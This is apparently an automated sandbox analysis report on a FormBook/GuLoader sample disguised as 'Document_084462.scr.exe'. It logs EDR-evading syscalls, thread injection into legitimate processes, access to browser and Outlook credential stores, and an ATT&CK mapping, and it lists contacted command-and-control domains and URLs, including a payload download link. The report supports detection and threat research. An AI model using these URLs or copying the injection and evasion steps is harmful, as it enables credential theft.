            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1EED mov eax, dword ptr fs:[00000030h]1_2_37AE1EED
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3EE2 mov eax, dword ptr fs:[00000030h]1_2_37AB3EE2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B53EFC mov eax, dword ptr fs:[00000030h]1_2_37B53EFC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B79ED2 mov eax, dword ptr fs:[00000030h]1_2_37B79ED2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B57ED0 mov ecx, dword ptr fs:[00000030h]1_2_37B57ED0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B37EC3 mov eax, dword ptr fs:[00000030h]1_2_37B37EC3
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B37EC3 mov ecx, dword ptr fs:[00000030h]1_2_37B37EC3
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1ED8 mov eax, dword ptr fs:[00000030h]1_2_37AF1ED8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEBED0 mov eax, dword ptr fs:[00000030h]1_2_37AEBED0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov eax, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov ecx, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov eax, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov eax, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov eax, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45E30 mov eax, dword ptr fs:[00000030h]1_2_37B45E30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3E01 mov eax, dword ptr fs:[00000030h]1_2_37AB3E01
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FE1F mov eax, dword ptr fs:[00000030h]1_2_37B2FE1F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FE1F mov eax, dword ptr fs:[00000030h]1_2_37B2FE1F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FE1F mov eax, dword ptr fs:[00000030h]1_2_37B2FE1F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FE1F mov eax, dword ptr fs:[00000030h]1_2_37B2FE1F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AABE18 mov ecx, dword ptr fs:[00000030h]1_2_37AABE18
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3E14 mov eax, dword ptr fs:[00000030h]1_2_37AB3E14
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3E14 mov eax, dword ptr fs:[00000030h]1_2_37AB3E14
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3E14 mov eax, dword ptr fs:[00000030h]1_2_37AB3E14
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AABE60 mov eax, dword ptr fs:[00000030h]1_2_37AABE60
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AABE60 mov eax, dword ptr fs:[00000030h]1_2_37AABE60
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1E70 mov eax, dword ptr fs:[00000030h]1_2_37AB1E70
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7E71 mov eax, dword ptr fs:[00000030h]1_2_37AE7E71
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2DE50 mov eax, dword ptr fs:[00000030h]1_2_37B2DE50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2DE50 mov eax, dword ptr fs:[00000030h]1_2_37B2DE50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2DE50 mov ecx, dword ptr fs:[00000030h]1_2_37B2DE50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2DE50 mov eax, dword ptr fs:[00000030h]1_2_37B2DE50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2DE50 mov eax, dword ptr fs:[00000030h]1_2_37B2DE50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAFE40 mov eax, dword ptr fs:[00000030h]1_2_37AAFE40
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AADE45 mov eax, dword ptr fs:[00000030h]1_2_37AADE45
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AADE45 mov ecx, dword ptr fs:[00000030h]1_2_37AADE45
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AADDB0 mov eax, dword ptr fs:[00000030h]1_2_37AADDB0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7DB6 mov eax, dword ptr fs:[00000030h]1_2_37AB7DB6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF4 mov eax, dword ptr fs:[00000030h]1_2_37B5FDF4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34F0721Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x34E7AA4Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x34F1BA4Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x601D676Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x601D430Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34E94B7Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x34F052EJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFC812F9E7F
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34E94FBJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x34E7247Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34E9488Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x34E8DE7Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x34F05CAJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x601D5FFJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x34F0679Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFCB7602651Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeNtQueueApcThread: Indirect: 0x12F5BBJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x34E86B2Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x34E93C9Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x602524DJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x34F07AF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeNtSuspendThread: Indirect: 0x133B19Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeNtSetContextThread: Indirect: 0x1337F9Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeNtResumeThread: Indirect: 0x133E39Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\Document_084462.scr.exeThread register set: target process: 7608Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 7608Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 6276Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\Document_084462.scr.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		1
            Masquerading            		1
            OS Credential Dumping            		321
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		311
            Process Injection            		12
            Virtualization/Sandbox Evasion            		LSASS Memory12
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object Model1
            Clipboard Data            		6
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials14
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567687 Sample: Document_084462.scr.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 29 www.optimismbank.xyz 2->29 31 www.zkdamdjj.shop 2->31 33 20 other IPs or domains 2->33 43 Suricata IDS alerts for network traffic 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected FormBook 2->47 51 4 other signatures 2->51 10 Document_084462.scr.exe 26 2->10         started        signatures3 49 Performs DNS queries to domains with low reputation 29->49 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->63 65 Tries to detect Any.run 10->65 67 Switches to a custom stack to bypass stack traces 10->67 14 Document_084462.scr.exe 6 10->14         started        signatures6 process7 dnsIp8 41 babalharra.com.au 122.201.127.17, 443, 49748 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 14->41 69 Modifies the context of a thread in another process (thread injection) 14->69 71 Tries to detect Any.run 14->71 73 Maps a DLL or memory area into another process 14->73 75 2 other signatures 14->75 18 RAVCpl64.exe 14->18 injected signatures9 process10 dnsIp11 35 thaor56.online 202.92.5.23, 49749, 49806, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 18->35 37 www.madhf.tech 103.224.182.242, 49766, 49767, 49768 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->37 39 12 other IPs or domains 18->39 53 Found direct / indirect Syscall (likely to bypass EDR) 18->53 22 waitfor.exe 13 18->22         started        signatures12 process13 signatures14 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 2 other signatures 22->61 25 firefox.exe 22->25         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Document_084462.scr.exe34%ReversingLabsWin32.Trojan.Guloader
            Document_084462.scr.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.madhf.tech/3iym/0%Avira URL Cloudsafe
            http://www.bankseedz.info/uf7y/0%Avira URL Cloudsafe
            http://www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.jcsa.info/hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.greenthub.life/r3zg/0%Avira URL Cloudsafe
            http://www.optimismbank.xyz/98j3/0%Avira URL Cloudsafe
            http://www.jcsa.info/hxi5/0%Avira URL Cloudsafe
            http://www.thaor56.online/fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g=0%Avira URL Cloudsafe
            http://www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
            http://www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=0%Avira URL Cloudsafe
            https://babalharra.com.au/)710%Avira URL Cloudsafe
            https://babalharra.com.au/0%Avira URL Cloudsafe
            http://www.bpgroup.site/cpit/0%Avira URL Cloudsafe
            http://www.43kdd.top/p3j6/0%Avira URL Cloudsafe
            http://www.yc791022.asia/31pt/0%Avira URL Cloudsafe
            http://www.zkdamdjj.shop/swhs/0%Avira URL Cloudsafe
            http://www.rgenerousrs.store/8gp4/0%Avira URL Cloudsafe
            http://www.rgenerousrs.store/8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=0%Avira URL Cloudsafe
            http://www.43kdd.top/p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.xcvbj.asia/hkgx/0%Avira URL Cloudsafe
            http://www.1secondlending.one/j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=0%Avira URL Cloudsafe
            https://babalharra.com.au/hEuJhxvbfOcCGqtagtOtF215.bin0%Avira URL Cloudsafe
            http://www.bankseedz.info/uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://www.yc791022.asia/31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs0%Avira URL Cloudsafe
            http://www.zkdamdjj.shop/swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs0%Avira URL Cloudsafe
            https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
            http://www.1secondlending.one/j8pv/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.bankseedz.info
            		46.30.211.38
            		truetrue
              		unknown
              www.optimismbank.xyz
              		13.248.169.48
              		truetrue
                		unknown
                www.madhf.tech
                		103.224.182.242
                		truetrue
                  		unknown
                  r0lqcud7.nbnnn.xyz
                  		23.225.159.42
                  		truetrue
                    		unknown
                    www.xcvbj.asia
                    		149.88.81.190
                    		truetrue
                      		unknown
                      bpgroup.site
                      		74.48.143.82
                      		truetrue
                        		unknown
                        43kdd.top
                        		38.47.232.202
                        		truetrue
                          		unknown
                          thaor56.online
                          		202.92.5.23
                          		truetrue
                            		unknown
                            www.1secondlending.one
                            		43.205.198.29
                            		truetrue
                              		unknown
                              www.zkdamdjj.shop
                              		172.67.187.114
                              		truetrue
                                		unknown
                                www.rgenerousrs.store
                                		104.21.57.248
                                		truetrue
                                  		unknown
                                  www.jcsa.info
                                  		208.91.197.39
                                  		truetrue
                                    		unknown
                                    www.yc791022.asia
                                    		101.35.209.183
                                    		truetrue
                                      		unknown
                                      www.greenthub.life
                                      		209.74.77.109
                                      		truetrue
                                        		unknown
                                        babalharra.com.au
                                        		122.201.127.17
                                        		truefalse
                                          		unknown
                                          aballanet.cat
                                          		134.0.14.158
                                          		truetrue
                                            		unknown
                                            www.remedies.pro
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.bpgroup.site
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.43kdd.top
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.laohub10.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.aballanet.cat
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.thaor56.online
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.bankseedz.info/uf7y/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jcsa.info/hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.optimismbank.xyz/98j3/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.madhf.tech/3iym/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jcsa.info/hxi5/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thaor56.online/fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.greenthub.life/r3zg/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.bpgroup.site/cpit/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
